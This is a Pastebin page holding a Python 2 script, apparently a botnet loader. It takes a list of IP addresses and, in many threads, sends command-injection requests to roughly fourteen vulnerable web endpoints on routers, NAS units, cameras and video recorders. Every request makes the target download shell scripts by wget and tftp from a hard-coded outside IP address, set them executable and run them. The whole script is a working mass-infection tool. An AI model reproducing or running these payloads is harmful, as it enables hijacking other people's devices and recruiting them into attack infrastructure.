API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 30th, 2018
193
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.67 KB | None | 0 0
raw download clone embed print report
  1. import threading, sys, os, re, time, socket, requests, commands, urllib2
  2. from Queue import *
  3. from sys import stdout
  4.  
  5. if len(sys.argv) < 3:
  6. print "Usage: python "+sys.argv[0]+" <list> <threads>"
  7. sys.exit()
  8.  
  9. ips = open(sys.argv[1], "r").readlines()
  10. threads = int(sys.argv[2])
  11. queue = Queue()
  12. queue_count = 0
  13.  
  14. before = "http://" #http://
  15.  
  16. tftpaddr = "95.215.60.17"
  17.  
  18. wgetaddr = "95.215.60.17"
  19.  
  20. wgetbin = "wgetbin.sh"
  21. tftp1bin = "tftp1bin.sh"
  22. tftp2bin = "tftp2bin.sh"
  23.  
  24. for ip in ips:
  25. queue_count += 1
  26. stdout.write("\r[%d] Added to queue" % queue_count)
  27. stdout.flush()
  28. queue.put(ip)
  29. print "\n"
  30.  
  31. def w():
  32. try:
  33. while True:
  34. try:
  35. IP = queue.get()
  36. st4rt = brute(IP)
  37. st4rt.start()
  38. queue.task_done()
  39. time.sleep(0.2)
  40. except:
  41. print "[*] THREAD UNABLE TO START" #may spam if finished
  42. pass
  43. except:
  44. pass
  45.  
  46. #adminvehkoja22120024
  47. #0000f00: 0000 0000 0000 0000 0000 0000 0000 0000 ................
  48. #9 spaces
  49.  
  50. class brute(threading.Thread):
  51. def __init__ (self, ip):
  52. threading.Thread.__init__(self)
  53. self.ip = str(ip).rstrip('\n')
  54. def run(self):
  55. try:
  56. #ret1 = urllib2.urlopen(before + self.ip + "/shell")
  57. #ret2 = urllib2.urlopen(before + self.ip + "/upgrade_handle.php")
  58. #ret3 = urllib2.urlopen(before + self.ip + "/setup.cgi")
  59. #ret4 = urllib2.urlopen(before + self.ip + "/cgi-bin/supervisor/PwdGrp.cgi")
  60. #ret5 = urllib2.urlopen(before + self.ip + "/cgi-bin/supervisor/CloudSetup.cgi")
  61. #ret6 = urllib2.urlopen(before + self.ip + "/cgi-bin/nobody/Search.cgi")
  62. #ret7 = urllib2.urlopen(before + self.ip + "/board.cgi")
  63. #ret8 = urllib2.urlopen(before + self.ip + "/app_license.shtml")
  64. #ret9 = urllib2.urlopen(before + self.ip + "/admin/confnetworking.html")
  65. #ret10 = urllib2.urlopen(before + self.ip + "/cgi-bin/webcm")
  66. #ret11 = urllib2.urlopen(before + self.ip + "/backupmgt/getAlias.php")
  67. #ret12 = urllib2.urlopen(before + self.ip + "/patch/books.cgi")
  68. #if ret1.code == 200:
  69. # print "JAWS Found: " + self.ip
  70. requests.get(before + self.ip + "/shell?" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " jaws; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " jaws; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " jaws;") # JAWS Web Server
  71. time.sleep(0.5)
  72. #if ret2.code == 200:
  73. # print "NetGear ReadyNAS Found: " + self.ip
  74. requests.get(before + self.ip + "/upgrade_handle.php?cmd=writeuploaddir&uploaddir=';" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " readynas; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " readynas; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " readynas;" + ";'") # Netgear ReadyNAS # works
  75. time.sleep(0.5)
  76. requests.get(before + self.ip + "/handle_daylightsaving.php?act=update&NTPServer=bla; " + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " readynas2; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " readynas2; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " readynas2;") # ReadyNAS Surveillance
  77. time.sleep(0.5)
  78. #if ret3.code == 200:
  79. # print "NetGear DGN1000 Found: " + self.ip
  80. requests.get(before + self.ip + "/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " dgn1000; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " dgn1000; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " dgn1000;" + "&curpath=/&currentsetting.htm=1") # NetGear DGN1000 #Works!
  81. time.sleep(0.5)
  82. #if ret4.code == 200:
  83. # print "AVTECH 1 Found: " + self.ip
  84. requests.get(before + self.ip + "/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " avtech1; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " avtech1; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " avtech1;" + ";&grp=SUPERVISOR&lifetime=5%20MIN") # AVTECH Test 1
  85. time.sleep(0.5)
  86. #if ret5.code == 200:
  87. # print "AVTECH 2 Found: " + self.ip
  88. requests.get(before + self.ip + "/cgi-bin/supervisor/CloudSetup.cgi?exefile=" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " avtech2; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " avtech2; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " avtech2;") # AVTECH Test 2
  89. time.sleep(0.5)
  90. #if ret6.code == 200:
  91. # print "AVTECH 3 Found: " + self.ip
  92. requests.get(before + self.ip + "/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " avtech3; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " avtech3; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " avtech3;" + ";);&password=admin") #AVTECH Test 3
  93. time.sleep(0.5)
  94. #if ret7.code == 200:
  95. # print "Vacron NVR Found: " + self.ip
  96. requests.get(before + self.ip + "/board.cgi?cmd=" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " vacron; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " vacron; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " vacron;") # Vacron NVR Video recorder # not sure
  97. time.sleep(0.5)
  98. #if ret8.code == 200:
  99. # print "AXIS Found: " + self.ip
  100. requests.get(before + self.ip + "/app_license.shtml?app=ORWELLLABS;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " axis; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " axis; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " axis;") # AXIS
  101. time.sleep(0.5)
  102. #if ret9.code == 200:
  103. # print "PineApp Found: " + self.ip
  104. requests.get(before + self.ip + "/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.com;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " pineapp; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " pineapp; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " pineapp;") # PineApp MailSecure
  105. time.sleep(0.5)
  106. #if ret10.code == 200:
  107. # print "Fritz!Box Found: " + self.ip
  108. requests.get(before + self.ip + "/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=& ;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " fritzbox; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " fritzbox; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " fritzbox;" + "; &") # Fritz!Box
  109. time.sleep(0.5)
  110. #if ret11.code == 200:
  111. # print "Seagate BlackArmor NAS Found: " + self.ip
  112. requests.get(before + self.ip + "/backupmgt/getAlias.php?ip=" + self.ip + " /etc/passwd; " + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " sgnas; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " sgnas; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " sgnas;") # Seagate BlackArmor NAS sg2000-2000.1331
  113. time.sleep(0.5)
  114. #if ret12.code == 200:
  115. # print "Web Terra Found: " + self.ip
  116. requests.get(before + self.ip + "/patch/books.cgi?file=|;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " webterra; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " webterra; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " webterra;" + ";|") # Web Terra 1.1 # Works
  117. time.sleep(0.5)
  118. requests.get(before + self.ip + "/cgi-bin/cgi_main?cmd=transfer_license&method=offline&sn=';" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " nvrmini2; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " nvrmini2; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " nvrmini2;" + ";#") # NVRmini2
  119. time.sleep(0.5)
  120. requests.get(before + self.ip + "/__debugging_center_utils___.php?log=something;" + "cd /tmp; wget http://" + wgetaddr + "/" + wgetbin + "; chmod 777 " + wgetbin + "; ./" + wgetbin + " nvrsolo; tftp " + tftpaddr + " -c get " + tftp1bin + "; chmod 777 " + tftp1bin + "; ./" + tftp1bin + " nvrsolo; tftp -r " + tftp2bin + " -g " + tftpaddr + "; chmod 777 " + tftp2bin + "; ./" + tftp2bin + " nvrsolo;") # NVRsolo
  121. except:
  122. pass
  123.  
  124. for l in xrange(threads):
  125. try:
  126. t = threading.Thread(target=w)
  127. t.start()
  128. time.sleep(0.01)
  129. except:
  130. print "[-] FAILED TO START WORKER THREAD"
  131. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!